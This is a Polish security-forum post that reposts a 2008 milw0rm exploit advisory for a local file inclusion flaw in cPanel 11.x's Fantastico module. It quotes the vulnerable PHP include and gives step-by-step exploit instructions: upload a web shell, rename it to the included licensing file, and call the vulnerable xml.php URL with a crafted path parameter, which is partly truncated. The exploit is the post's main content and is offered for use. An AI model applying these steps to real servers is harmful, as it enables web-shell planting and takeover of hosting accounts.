Skocz do zawartości
Zaloguj się, aby obserwować  
Obserwujący 0
lukaschemp

Cpanel <= 11.x (Fantastico) Local File Inclusion Vulnerability (sec bypass)

Przez lukaschemp, w Bezpieczeństwo

Polecane posty

lukaschemp    27

lukaschemp
Napisano

##############################################################

Fantastico In all Version Cpanel 11.x <= local File Include

 

##############################################################

 

 

Must login to :2082

To break the protection mod_security & safe_mode: off & Disable functions : all none

 

 

 

Vulnerable Code

 

$licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php";

if (is_file($licensing_servers))

{

include($licensing_servers);

 

 

in

 

http://xx.com:2082/frontend/x/fantastico/includes/xml.php

 

 

Exploit >>

 

First Create directory Let the name /includes/ and upload Shell.php in /includes/ Then rename it to enc_licensing_servers.php

 

 

:::xploit::::

 

http://xxx.com:2082/frontend/x/fantastico/...path=/home/user

 

 

 

###################################################

 

Discoverd By : joker_1

 

 

 

for info : pl57@msn.com

 

 

 

###################################################

 

Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star

 

###################################################

 

# milw0rm.com [2008-09-14]

Udostępnij ten post

Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się
Zaloguj się, aby obserwować  
Obserwujący 0
Przejdź do listy tematów Bezpieczeństwo
×